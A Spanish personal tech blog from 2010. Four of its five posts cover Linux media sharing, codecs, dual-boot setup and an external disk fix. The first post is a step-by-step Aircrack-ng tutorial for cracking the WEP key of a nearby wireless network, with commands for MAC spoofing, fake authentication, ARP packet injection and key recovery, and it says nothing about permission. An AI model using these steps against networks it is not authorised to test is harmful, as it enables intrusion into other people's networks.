jueves, 18 de febrero de 2010

Obtener claves WEP con ayuda de Aircrack-ng

Aircrack-ng es una suite de programas para la auditoría de redes inalámbricas.


Es posible obtener las claves cifradas WEP y WPA/WPA2-PSK siendo las claves WEP las más fáciles de descifrar y por error para el usuario de una conexión la más común.

Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.


¿Qué necesito para usar Aircrack-ng?.

Es necesario tener una tarjeta de red inalámbrica compatible con airodump-ng (ver lista de compatibilidad). Airodump-ng es el programa con el que se capturan los paquetes cifrados de la red atacada para poder descifrar la clave.

Los programas en cuestión que trae Aircrack-ng así como macchanger.


¿Qué es recomendado tener para usar Aircrack-ng?


Debido a que Aireplay-ng solo es compatible con el sistema operativo GNU/Linux, si queremos poder inyectar paquetes es necesario que usemos alguna distribución GNU/Linux. Hay que mencionar que hay distribuciones específicas que contienen ya Aircrack-ng así como más programas y utilidades y driver parcheados para inyectar paquetes. Tales distribuciones son Live CD o Live USB, ésto significa que no es necesario instalarlos en nuestra máquina, basta con grabarlos en un CD o USB e iniciar la máquina arrancando desde ellos. Algunas de estas distribuciones son: Backtrack, WifiSlax, WifiWay

¿Cómo me instalo Aircrack-ng y Macchanger si no quiero usar Live CD o Live USB?


Aircrack-ng Downloads

En Ubuntu:

sudo apt-get install aircrack-ng

Para instalar Macchanger, puedes pasarte por su web

Macchanger Downloads

En Ubuntu:

sudo apt-get install macchanger

Ya que tenemos todo preparado: Tarjeta compatible con airodump-ng y aireplay-ng y macchanger, os voy a dejar unos comando básicos para hacer un ataque a una red con encriptacion WEP con clientes asociados.

Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.

Primero abrimos una terminal (consola) y entramos como superusuario(root) para tener privilegios. Este comando varía según la distribución GNU/Linux que usemos.

sudo su

*** Preparación de la tarjeta

airmon-ng

>>interfaz inalámbrico: nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0, wlan0, ath0, ra0,…). Yo usaré ra0 por tener una ralink 2500.

airmon-ng stop ra0

>>monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado.

ifconfig ra0 down

>>tarjeta de red desactiva: no sale nada por pantalla.

macchanger –mac 00:11:22:33:44:55 ra0

>>Current mac: xx:xx:xx:xx:xx:xx Fake mac:00:11:22:33:44:55: nos da la mac original y la falsa que hemos nos hemos asignado para luego poder inyectar paquetes.

airmon-ng start ra0

>>monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturar paquetes)

*** Escaneo de redes y clientes asociados

airodump-ng ra0

>>redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la información como canal, nombre, calidad de señal, tipo de encriptación, etc.. y los clientes que están conectadas a las redes.

Paramos la ejecución del comando pulsando “Control+C”, o cerrando y abriendo otra terminal.

airodump-ng –c NumeroDeCanal –w ArchivoDeCapturas –bssid BBSID ra0

Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado: airodump-ng -c 11 -w capturaswifi - - bssid 00:01:02:03:04:C1

>>Capturando paquetes…: nos va saliendo la captura de paquetes así como la señal de la red y los clientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LA CIERRES!!!


Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aireplay-ng -1 0 –a BSSID –h 00:11:22:33:44:55 –e ESSID ra0

>>Association successful: Con esto hacemos una autenticación falsa en el router. Para ello en el comando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y el nombre que tiene la red atacada, es decir, la ESSID. Es importante que nos salga el Association Succesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED ra0.

aireplay-ng -3 –b BSID –h 00:11:22:33:44:55 ra0

>>Envío de paquetes…: nos saldrá por pantalla que se están mandando paquetes, para que la inyección sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b 00:01:02:03:04:05 -h 00:11:22:33:44:55 ra0. Ahora dejamos que siga inyectando paquetes, por tanto NO CIERRES ESTA TERMINAL!!!

*** Crackeo WEP

Para poder obtener la clave WEP es necesario tener un mínimo de paquetes recogidos. El número de paquetes dependerá de la longitud que tenga la clave WEP. Como mínimo recomiendo que empecéis a intentar conseguir la clave a partir de 25.000 por si la clave es de las cortas.

Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemos más de 25.000 #data recogidos.

Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aircrack-ng –b BSSID ArchivoDeCapturas.cap

>>Clave WEP encontrada/no encontrada: El programa empezará a descifrar los paquetes recogidos, y cuando finalice nos dirá si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo volvamos a intentar superados “X” paquetes recogidos. Si la encuentra nos saldrá: KEY FOUND! y la clave en hexadecimal normalmente.

Fuente:

www.aircrack.org


Saludos,


David Loor M.

viernes, 12 de febrero de 2010

Implementación Servidor DAAP Linux (Compartir Fonotecas)

Existen dos formas simples de compartir archivos con dispositivos que se encuentren en una misma red.
  1. Compartiendo la carpeta de tus archivos: Bastante ineficiente ya que la biblioteca musical compartida no está ordenada y nos será difícil encontrar los medios que queremos reproducir.
  2. Mediante un Servidor de Medios: Bastante fácil y cómodo de utilizar, una vez que se ha configurado el servidor, los clientes pueden hacer acceder a él conociendo la IP y el puerto por el cuál escucha las peticiones. Nuestro reproductor no tardará ni 5 segundos en agregar un promedio de 10000 canciones (lo digo por experiencia propia, en una red no muy saturada), y toda la información multimedia (titulo, artista, tiempo de duración, álbum, etc) se descargará automáticamente.
Tomando en consideración las premisas anteriores implementaremos un servidor con el protocolo DAAP (Digital Audio Access Protocol, Protocolo de Acceso a Audio Digital).

Este es un protocolo privativo desarrollado por Apple para usarlo en su ya conocido itunes para compartir archivos multimedia entre usuarios de esta aplicación. Apple no ha liberado las especificaciones de este protocolo pero haciendo ingeniería inversa han logrado obtener un DAAP libre, se esta convirtiendo por si mismo en un estándar ya que algunas casas comerciales de reproductores ya lo implementan.

La configuración es bastante sencilla, no toma más de 10 minutos su configuración. Sin más palabreo, vamos a la configuración.


  • Bajamos los paquetes necesarios para su funcionamiento:

Debian, Ubuntu

sudo apt-get install mt-daapd avahi-daemon libid3tag0

Fedora, Centos, Redhat

sudo yum install mt-daapd avahi-daemon libid3tag0


  • Configuramos los servicios para arrancar en el inicio del sistema.
chkconfig avahi-daemon on
chkconfig mt-daapd on

  • Debemos configurar el archivo /etc/mt-daapd.conf, donde especificamos el nombre del servidor, directorio donde tenemos almacenado en nuestro servidor. También lo podemos hacer atravez de su interfaz web en esta dirección http://localhost:3689/.
"El campo usuario lo dejamos en blanco y como contraseña ingresamos mt-daapd.

En la sección de configuración tenemos que cambiar algunas cosas para iniciar un servidor básico:

Admin password: Para dejar de usar la contraseña por defecto (recomendable)

Music folder: Acá agregamos la(s) carpeta(s) que contienen las canciones que deseamos compartir.

Otras opciones que podemos cambiar (pero que no son vitales) son: Server Name (el nombre que será visto por los clientes), Music Password (si es que deseamos que los clientes ingresen una contraseña para poder acceder a la música) y Rescan Interval (cada cuanto tiempo deseamos que Firefly busque nuevas canciones en los directorios, importante si constantemente agregamos nueva música).

Configuración extra

Hay una opción de configuración a la que hay que prestarle atención: Run As (se accede a ella dando click al link para mostrar las opciones avanzadas). Esta opción especifica con qué usuario correrá el servicio de Firefly y por defecto está con mt-daapd (al momento de la instalación se creó automáticamente este usuario del sistema).

Si es que el usuario mt-daapd no tiene los permisos de lectura sobre las carpetas donde están los archivos de audio, el servidor no podrá agregarlas a la biblioteca. Tenemos 2 opciones:

  • Cambiar la opción Run As a root que es lo más sencillo pero menos recomendable (por inseguro). Si el servidor está en un “ambiente seguro” (tu casa, no accesible desde internet, etc.) podría usarse esta opción.
  • Dar al usuario mt-daapd los permisos sobre las carpetas. Esto también es sencillo, pero implica algunos pasos extra." Ver Fuente

Para acceder desde un cliente, por ejemplo usando el reproductor Rhythmbox debemos seguir los siguientes pasos:

  1. Ejecutar Rhythmbox
  2. Nos vamos a musica/Conectar con una compartición DAAP
  3. Ponemos equipo:puerto (dirección_IP_del_servidor:3689)
Los reproductores que son compatibles con el protocolo DAAP los podemos ver en este enlace: Ver Reproductores compatibles


Saludos,

jueves, 11 de febrero de 2010

Reproducir Archivos multimedia (MP3, DVD, etc) en Fedora 11

Quería escuchar mi música preferida en Fedora y resulta que no venía instalado por defecto el decodificador de MP3, Rhythmbox trataba de buscarlos automáticamente en internet pero no los encontraba. Me preocupaba ya que Ubuntu bucaba todos los paquetes que yo necesitaba ahorrándome el trabajo, así que no tenía ni idea de qué debía instalar.

Buscando un poco de información al respecto en Google, descubrí que Fedora y Red Hat no traían pre-instalado paquetes que los puedan comprometer legalmente, cómo por ejemplo el algoritmo de codificación/decodificación de Mp3 es patentado y penado por las leyes de EEUU; asi que para poder reproducir nuestra música preferidad grabada en formato Mp3 o formatos patentados, debemos instalar rpm-fusion, el paquete que nos permite instalar de una manera fácil cualquier otro tipo de paquete, valga la redundancia, patentado o no patentado.

http://fedoraproject.org/wiki/ForbiddenItems

En ese enlace podemos obtener información oficial.

Después de una introducción no muy técnica, pasamos a la instalación de lo que necesitamos para reproducir nuestros archivos multimedia.

  1. $ su root

    # rpm -ivh http://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-stable.noarch.rpm
    # rpm -ivh http://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-stable.noarch.rpm
  2. # yum -y update @sound-and-video 
Estos dos pasos instalarán primero el rpmfusion "para paquetes libres y restritivos", además instalara los codecs para que los motores Xine y Gstreamer tengan mayor soporte para archivos multimedia.


Saludos,

miércoles, 10 de febrero de 2010

Instalación fedora 11 con Ubuntu 9.04 Pre-Instalado

Este blog lo creé con la finalidad de documentar las soluciones a todos aquellos problemas que encontrara en mi uso del software libre principalmente, pero en general, cualquier empresa que emprenda con la tecnología.

Esta vez quiero publicar la solución a un pequeño problema que se me presentó a la hora de instalar Fedora 11, teniendo instalado Ubuntu 9.04.

Quisé empezar probando Fedora 11 con el sistema de archivos Ext4 y el instalador no me lo permitía, sin saber la razón de esto me sentí obligado a buscar informació con la ayuda de google, para descubrir que Fedora 11 no es compatible con este tipo de sistema de archivos. Más precisamente no es compatible con la partición /boot que es donde se instala el kernel; por lo tanto si lo que ustedes quieren es usar Ext4 con Fedora 11, creen una partición independiente para /boot que debe usar Ext3.

Luego de terminada la instalación, no podía acceder a ubuntu. Quise simplemente configurar el Grub de Fedora para poder hacer que este cargue Ubuntu, pero resulta que son incompatibles.

Asi que la forma de resolver este problemita es la siguiente, la encontré luego de gastar un par de horas googleando:

  1. Suponemos que estamos sobre Fedora, debemos montar la partición donde está instalado Ubuntu.
  2. Una vez montada la partición de Ubuntu, accedemos a esta dirección de esta; /boot/
  3. Aqui hay unos archivos que debemos copiarlos, con nombres similares a estos: initrd.img-2.6.28-17-generic y vmlinuz-2.6.28-17-generic. Los nombres cambiaran de acuerdo a la versión del kernel que tengan instalada.
  4. Ahora nos vamos a la partición donde está instalado Fedora y entramos a este directorio /boot/ y pegamos los dos archivos anteriormente citados.
  5. Desde una consola logueados como root; escribimos esto: gedit /media/NOMBRE_DE_LA_PARTICION_ESTA_INSTALADO_SU_UBUNTU/boot/grub/menu.lst. Estas lineas son las que permiten cargar Ubuntu en su grub, y las copiamos para pegarlas luego en el grub de Fedora. Estás son para mi caso, deben variar un poco en su sistema.
  1. gedit /boot/grub/grub.conf, y copiamos las lineas arriba mencionadas.

Con esto reiniciamos el equipo y ya podemos seleccionar entre nuestras dos distribuciones Fedora y Ubuntu.


No olvides dejar tus comentarios si te ha servido mi información, o aún mejor si tienes una mejor solución.


Saludos,



lunes, 1 de febrero de 2010

Problema Imation Apollo Disco Externo

A pesar que mi carrera universitaria me obliga a estar conectado casi todo el dia a internet, no deja de sorprenderme la cantidad de información útil que hay en este medio y la cantidad de problemas que nos ayuda a resolver.

En esta ocasión quiero publicar esta entrada para todas aquellas personas que lleguen a tener un problema similar al mio con un Disco externo de 2.5" Imation Apollo.



Resulta que mi disco externo era reconocido por los Sistemas Operativos (Micro$soft y/o GNU/Linux) pero no les asiganaba una letra en el caso de los primeros y no era posible montarlos para los segundos.

Despúes de tanto googlear (Ahora esto es un verbo, jejeje) encontré una solución la cual consiste en lo siguiente, lo malo es que es necesario usar software micro$oft (Windows Vista o 7):

  1. Entran a panel de control.
  2. Herramientas Administrativas
  3. Administración de equipos
  4. En la parte izquierda, en la pestaña Almacenamiento encontramos la opción "Administración de discos"
Y pueden darse cuenta que el S.O. ha detectado su disco externo pero no le ha asigando una unidad.

El siguiente paso es asignarle una unidad con las instruciones del S.O.; lo malo es que se debe formatear la unidad.

Y si despúes de eso resulta que lo quieren conectar a su disco externo en cualquier otra máquina y no lo detecta, ni siquiera haciendo los pasos anteriores a pesar que pueden ver claramente que el disco está prendido.

Entonces la solución a eso es tan simple, que despúes que la descubrí me reí de mi mismo (Por qué no se me ocurrió antes).

Su disco tiene un cable con dos accesos USB para conectarlo al computador, para qué creen que sirve ?? (Para que si en caso se me dañe uno, uso el otro JEJEJE).

En realidad sirven para conectar el disco con los dos conectores al computador en caso de que uno sólo no le proporcione la energía necesaria.

Pues esa es la solución, si conectando sólo 1 USB no les funcione prueben conectado los 2. Y si ahi no les funciona puede ser problema eléctrico.


Saludos,


David Loor M.